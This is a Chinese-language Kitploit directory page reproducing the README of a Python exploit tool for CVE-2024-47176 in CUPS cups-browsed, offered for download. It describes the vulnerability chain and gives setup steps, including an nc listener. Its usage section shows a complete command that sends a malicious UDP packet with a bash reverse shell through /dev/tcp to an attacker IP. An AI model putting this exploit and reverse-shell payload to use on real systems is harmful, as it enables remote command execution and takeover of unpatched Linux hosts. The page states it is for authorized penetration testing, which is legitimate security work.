Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/gumerzzzindo/cve-2024-47176
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

针对CVE-2024-47176的Python漏洞利用,通过精心构造的UDP数据包在CUPS cups-browsed中实现远程命令执行。包含反向shell载荷传递,用于授权的渗透测试。

查看仓库
22个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-47176 — CUPS 中的远程命令执行

CVE CVSS Python Platform License

仅用于教育和授权的渗透测试目的。


目录

  • 描述
  • 受影响系统
  • 相关 CVE
  • 前提条件
  • 安装
  • 用法
  • 免责声明

描述

CUPS(通用 UNIX 打印系统)是一个开源打印系统,用于管理网络打印机。CVE-2024-47176 针对 cups-browsed 守护进程,该进程绑定到 INADDR_ANY:631 并盲目信任来自任何来源的数据包。

通过构造一个恶意 UDP 数据包,触发 Get-Printer-Attributes IPP 请求,攻击者可以让 cups-browsed 连接到攻击者控制的服务器——当与以下漏洞结合时,可达成 任意远程命令执行。


受影响系统

组件条件
cups-browsed默认监听 UDP 631
CUPS < 2.4.11未修补版本
暴露 CUPS 的 Linux 系统攻击者可访问端口 631

相关 CVE

CVE描述
CVE-2024-47176cups-browsed 信任端口 631 上的任何 UDP 数据包
CVE-2024-47076libcupsfilters 不清理 IPP 属性
CVE-2024-47175libppd 将未清理的数据注入 PPD 文件
CVE-2024-47177cups-filters 允许通过 PPD 执行命令

前提条件

  • 目标机器已暴露 端口 631(IPP/UDP)
  • 攻击机器上装有 Python 3.x
  • nmap(可选,用于侦察)
  • 用于接收反弹 Shell 的 netcat 监听器

安装

1. 克隆仓库:

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. 安装所需的 Python 依赖:

root@kitploit:~
pip install ippserver

3. 在您的机器上启动监听器:

root@kitploit:~
nc -lvnp <PORT>

用法

root@kitploit:~
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

示例 — 反弹 Shell:

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

运行利用程序后,在目标上触发一个打印任务(或等待自动检查)以执行载荷。


免责声明

本仓库仅用于教育目的和授权安全研究。将此工具用于测试您不拥有或未经明确书面许可的系统是违法且不道德的。

下载工具